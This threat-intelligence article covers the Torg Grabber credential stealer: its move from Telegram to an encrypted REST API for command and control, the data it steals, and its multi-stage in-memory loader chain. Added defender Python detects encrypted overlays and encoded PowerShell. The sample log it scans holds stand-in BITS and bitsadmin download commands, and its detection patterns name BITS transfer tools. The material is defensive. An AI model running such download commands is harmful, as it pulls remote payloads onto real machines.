Torg Grabber Stealer Shifts to Encrypted REST API for C2
Key Takeaways
- Torg Grabber, a credential stealer offered as Malware-as-a-Service (MaaS), has rapidly evolved its command-and-control (C2) infrastructure.
- The malware transitioned from simple Telegram-based exfiltration to a highly sophisticated, encrypted REST API C2 system within three months.
- Torg Grabber targets a wide array of sensitive data, including browser credentials, cryptocurrency wallets, 2FA tools, and session data from popular applications like Discord and Steam.
- The stealer utilizes a multi-stage loader chain and in-memory execution to evade detection, often delivered via fake game cheats or cracked software.
Torg Grabber Stealer Adopts Encrypted REST API for Advanced C2 Operations
A new credential-stealing malware, identified as Torg Grabber, is rapidly escalating its capabilities as a Malware-as-a-Service (MaaS) offering. In a mere three months, this stealer has undergone significant development, migrating its data exfiltration mechanisms from basic Telegram channels to a sophisticated, encrypted REST API for command-and-control (C2) communications. This swift evolution underscores a growing trend of advanced techniques within the cybercrime landscape.
Initially relying on straightforward Telegram-based data exfiltration, Torg Grabber quickly matured to leverage a fully encrypted REST API for its C2 infrastructure. The operational scale of this threat is evident, with 334 unique samples compiled during its brief observed lifespan and over 40 distinct operator tags discovered within its binaries. This robust activity indicates an organized, builder-based cybercrime operation catering to numerous malicious buyers.
The malware derives its name from one of its primary C2 domains, technologytorg.com, where “torg” is a Russian term signifying “trade” or “marketplace.” This nomenclature is particularly fitting given the malware’s purpose of acquiring and trading stolen credentials.
Discovery and Technical Analysis
The discovery of Torg Grabber began when a sample, initially misidentified as Vidar Stealer, arrived at a research lab. Forensic examination quickly revealed discrepancies: the binary was a 64-bit Portable Executable compiled with MinGW-GCC, contrasting sharply with Vidar’s 32-bit MSVC build. Further analysis uncovered an embedded debug string, “grabber v1.0,” and a C2 protocol utilizing REST API endpoints secured with ChaCha20 encryption and HMAC-SHA256 authentication—architectural elements entirely distinct from Vidar.
Gen Digital’s Threat Research Team was responsible for identifying and formally naming the malware after an in-depth dissection of its binary. Their analysts confirmed that Torg Grabber progressed through three distinct exfiltration phases within its short operational period.
- Phase 1 (December 9-11, 2025): Early builds transmitted stolen ZIP archives to private Telegram channels via the Telegram Bot API, a method offering speed and requiring minimal infrastructure.
- Phase 2 (December 17-20, 2025): The malware briefly shifted to a raw TCP socket protocol, employing a custom 9-byte binary frame secured with ChaCha20-Poly1305 encryption.
- Phase 3 (Beginning December 18, 2025): Torg Grabber transitioned to a production-grade REST API over HTTPS, routed through Cloudflare. This advanced approach significantly complicates traffic interception and domain-based blocking efforts.
The malware’s data collection capabilities are extensive. It targets credentials from 25 Chromium-based browsers and 8 Firefox-family browsers, harvests data from over 850 browser extensions including cryptocurrency wallets and two-factor authentication (2FA) tools, and captures session data from applications like Discord, Telegram, and Steam. Additionally, it collects VPN configurations, FTP client data, and desktop screenshots. Prior to initiating data collection, Torg Grabber performs an evasion check, scanning for 46 antivirus signatures across 24 different security products to assess the victim’s defenses.
Investigations into the confirmed operator tags linked eight of them to active Telegram accounts associated with Russian-speaking cybercrime networks.
The Loader Chain: From Dropper to In-Memory Execution
Torg Grabber is not deployed as a standalone executable; instead, it is delivered via a sophisticated, multi-stage loader chain designed to evade detection. This chain progressively unpacks the stealer, ensuring it only executes in memory.
The initial stage, referred to as Stage 0, functions as the dropper. Victims typically encounter this through deceptive means such as fake game cheats, pirated software packages, or clipboard injection attacks (like ClickFix) hosted on Google Apps Script. A documented infection on January 30, 2026, involved a malicious webpage silently injecting a PowerShell command into the user’s clipboard, instructing them to paste and execute it. This action initiated a covert BITS Transfer download, which then executed through Windows’ legitimate svchost.exe process, effectively blending with normal system traffic and bypassing many endpoint security tools.
Stage 1 is a self-extracting loader containing an AES-256-CBC encrypted overlay appended beyond the binary’s standard section data. This stage decodes and decrypts its payload using custom hex decoding and AES decryption routines. It further enhances stealth by resolving Windows NT API calls at runtime through direct syscalls, thus presenting no visible imports for static analysis tools to flag.
Stage 2 operates entirely within memory as a reflective PE loader. This stage maps the final stealer payload directly into memory without writing any components to disk. By the time Stage 3 activates, the Torg Grabber stealer is running within a live process, leaving no persistent files for disk-based scanning or detection.
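As an added defender-side illustration, not code from the report or from Gen Digital, the following Python walks a PE's section table to find data appended past the last section (the Stage 1 encrypted-overlay pattern described above) and scores that trailing data's entropy; the PE it parses is a constructed minimal sample, and the 7.5-bit threshold is an assumption for the demo.

```python
import math
import struct
from collections import Counter

def build_sample_pe(overlay: bytes) -> bytes:
    """Constructed sample: minimal non-runnable PE32+ with one section plus `overlay` appended."""
    pe_off = 0x40
    dos = bytearray(b"MZ").ljust(pe_off, b"\0")
    struct.pack_into("<I", dos, 0x3C, pe_off)                 # e_lfanew -> PE header
    opt_size = 0xF0                                            # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                      # PE32+ magic
    raw_ptr, raw_size = 0x200, 0x200
    section = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", raw_size, 0x1000, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = dos + b"PE\0\0" + coff + opt + section
    return bytes(header.ljust(raw_ptr, b"\0")) + b"\xCC" * raw_size + overlay

def find_overlay(data: bytes):
    """Return (offset, bytes) of anything past the last section's raw end, else None."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    sec_table = pe_off + 24 + opt_size                          # after COFF + optional header
    end = 0
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return (end, data[end:]) if len(data) > end else None

def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: ~8.0 for encrypted or well-compressed data, near 0 for padding."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def triage(data: bytes, threshold: float = 7.5) -> dict:
    """Flag a PE whose trailing overlay looks encrypted (the Stage 1 loader pattern)."""
    found = find_overlay(data)
    if found is None:
        return {"overlay": False, "suspicious": False}
    offset, blob = found
    entropy = shannon_entropy(blob)
    return {"overlay": True, "offset": offset, "size": len(blob),
            "entropy": round(entropy, 3), "suspicious": entropy >= threshold}
```

Real samples may also carry legitimate overlays (installers, signed binaries), so a high-entropy overlay is a triage signal to pair with the other indicators above, not a verdict on its own.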
What You Should Do
- Exercise Caution with Downloads: Avoid downloading software from untrusted sources, including unofficial game cheat sites, cracked application platforms, and suspicious links.
- Monitor PowerShell Activity: IT security teams should implement monitoring for PowerShell commands containing base64-encoded arguments and unexpected BITS Transfer job creations.
- Enhance Endpoint Detection: Configure endpoint security tools to flag direct syscall usage and patterns indicative of in-memory PE loading.
- Secure Browser Data: For organizations using Chromium-based browsers, ensure App-Bound Encryption is properly configured. Treat any unexplained browser process suspensions during normal activity as a potential indicator of compromise.
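As an added example that is not part of the original article, this Python applies the PowerShell and BITS monitoring advice above to constructed process-creation log lines: it decodes -EncodedCommand arguments (base64 of UTF-16LE text) and flags BITS transfer activity in either the raw or the decoded command. The log format, the example.invalid URLs and the script text are all constructed for the demo.

```python
import base64
import re

# Switches that carry an encoded PowerShell command: -e, -ec, -en, -enc, -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# BITS usage from PowerShell or from the bitsadmin tool.
BITS = re.compile(r"(?i)start-bitstransfer|import-module\s+bitstransfer|bitsadmin(?:\.exe)?\s+/transfer")
PS_IMAGE = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are UTF-16LE text, base64-encoded; return '' if undecodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyse_line(line: str) -> dict:
    """Inspect one process-creation record: returns the command, any decoded script and flags."""
    m = re.search(r"CommandLine:\s*(.*)$", line)
    cmd = m.group(1).strip() if m else line.strip()
    decoded, flags = "", []
    if PS_IMAGE.search(cmd):
        enc = ENC_FLAG.search(cmd)
        if enc:
            flags.append("powershell_encoded_command")
            decoded = decode_encoded_command(enc.group(1))
    if BITS.search(cmd) or BITS.search(decoded):
        flags.append("bits_transfer")
    return {"command": cmd, "decoded": decoded, "flags": flags}

def scan_log(text: str) -> list:
    """Return only the records that raised at least one flag."""
    return [r for r in map(analyse_line, text.splitlines()) if r["flags"]]

# Constructed sample log: a BITS download hidden inside an encoded one-liner (line 1),
# benign activity (line 2) and a bare bitsadmin job (line 3). example.invalid is a reserved name.
SCRIPT = r"Start-BitsTransfer -Source 'http://example.invalid/stage1' -Destination $env:TEMP\s.bin"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LOG = rf"""Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine: powershell.exe -NoP -w hidden -EncodedCommand {ENCODED}
Image: C:\Windows\System32\notepad.exe | CommandLine: notepad.exe C:\Users\alice\notes.txt
Image: C:\Windows\System32\bitsadmin.exe | CommandLine: bitsadmin /transfer job /download http://example.invalid/x.bin C:\Users\Public\x.bin
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["flags"], hit["command"][:80])
```

Decoding the encoded argument before matching is what makes the rule useful here, since the BITS cmdlet never appears in the raw command line of the first record.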
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.